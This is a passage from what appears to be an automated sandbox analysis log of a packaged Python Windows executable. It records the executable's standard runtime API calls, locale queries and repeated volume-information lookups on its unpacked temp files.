        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF60299C19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF60299C19C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF60299B910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF60299B910
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF60299C37C SetUnhandledExceptionFilter,1_2_00007FF60299C37C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF6029A9494 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6029A9494
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF60299C19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF60299C19C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FF60299B910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF60299B910
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFABD2A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFDFABD2A70
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFABD3028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFABD3028
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFDFF24212B IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFF24212B
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE00798160 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE00798160
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0075EA58 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0075EA58
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CF91030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0CF91030
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CF91A80 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0CF91A80
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFB1A80 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0CFB1A80
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFB1030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0CFB1030
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFD1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0CFD1960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFD1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0CFD1390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFE1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0CFE1960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0CFE1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0CFE1390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E131960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0E131960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E131390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0E131390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E141960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0E141960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E141390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0E141390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E151960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0E151960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E151390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0E151390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E161960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0E161960
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 1_2_00007FFE0E161390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE0E161390
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeProcess created: C:\Users\user\Desktop\DChOtFdp9T.exe "C:\Users\user\Desktop\DChOtFdp9T.exe"Jump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: 0_2_00007FF6029B85D0 cpuid 0_2_00007FF6029B85D0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00007FFE007920D8
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,1_2_00007FFE007909FC
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00007FFE007922E0
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetPrimaryLen,EnumSystemLocalesW,1_2_00007FFE00791BE4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: EnumSystemLocalesW,1_2_00007FFE00791B7C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetPrimaryLen,EnumSystemLocalesW,1_2_00007FFE00791C98
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetLastError,Concurrency::details::_Concurrent_queue_iterator_base_v4::~_Concurrent_queue_iterator_base_v4,GetLocaleInfoW,GetLocaleInfoW,1_2_00007FFE0073EDE4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: GetLocaleInfoW,1_2_00007FFE0074257C
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeCode function: WideCharToMultiByte,GetLocaleInfoW,GetLocaleInfoW,1_2_00007FFE0073EFA4
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Cipher VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\certifi VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info\license_files VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\cryptography-43.0.3.dist-info\license_files VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\ucrtbase.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_ctypes.pyd VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_bz2.pyd VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\_lzma.pyd VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402\base_library.zip VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56402 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\DChOtFdp9T.exeQueries volume information: C:\Users\user\Desktop\DChOtFdp9T.exe VolumeInformationJump to behavior
